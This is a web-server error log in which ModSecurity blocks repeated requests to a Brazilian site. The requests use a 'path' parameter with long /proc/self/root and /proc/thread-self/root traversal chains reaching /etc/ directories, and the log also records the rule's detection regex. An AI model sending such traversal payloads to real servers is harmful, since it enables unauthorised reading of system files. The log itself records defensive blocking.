[Fri Mar 20 03:45:42.986971 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.241.31:41962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztFvHIg5MgXLBnicPLiQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:44.960406 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:58798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztGBCii7xarUs8iHYz9AAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:47.471945 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.241.31:41964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztG11pVZ5mVmJwsFMBoQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:47.650221 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:58812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztGzJ3M9BSuKP7CAbf8QAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:49.022557 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:58820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztHfHIg5MgXLBnicPLiwAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:55.623489 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:43890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztI_XLqtnMIWvjpaJo8wAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:56.327102 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:36372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztJPXLqtnMIWvjpaJo9QAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:56.864546 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:43900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztJLninkcc-iUj5AotpQAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:58.190543 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:43902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztJgF0L0L-SsrnPo437AAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:45:59.792192 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:47254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztJ-oXxyEfFpUF8f9TqQAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:46:00.528147 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:37222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztKOoXxyEfFpUF8f9TqgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:01.859747 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:37230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztKTJ3M9BSuKP7CAbf_QAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:04.376294 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.241.31:47268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztK11pVZ5mVmJwsFMBrgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:46:04.845823 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 57.141.18.91:44852] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:46:05.702307 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.241.31:47272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztLfHIg5MgXLBnicPLkwAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:46:06.771746 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:37246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztLuoXxyEfFpUF8f9TsQAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:08.055871 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.243.128:37250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztMDJ3M9BSuKP7CAbgBAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:10.541922 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:37258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztMvqxLDW4GITHUkSxwwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:12.874775 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:54040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztNLninkcc-iUj5AotrwAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:14.197635 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:54042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztNta6ubjKNq_cu4aeSgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:16.658648 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.241.31:47286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztODJ3M9BSuKP7CAbgFAAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:17.991156 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:32824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztOda6ubjKNq_cu4aeSwAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
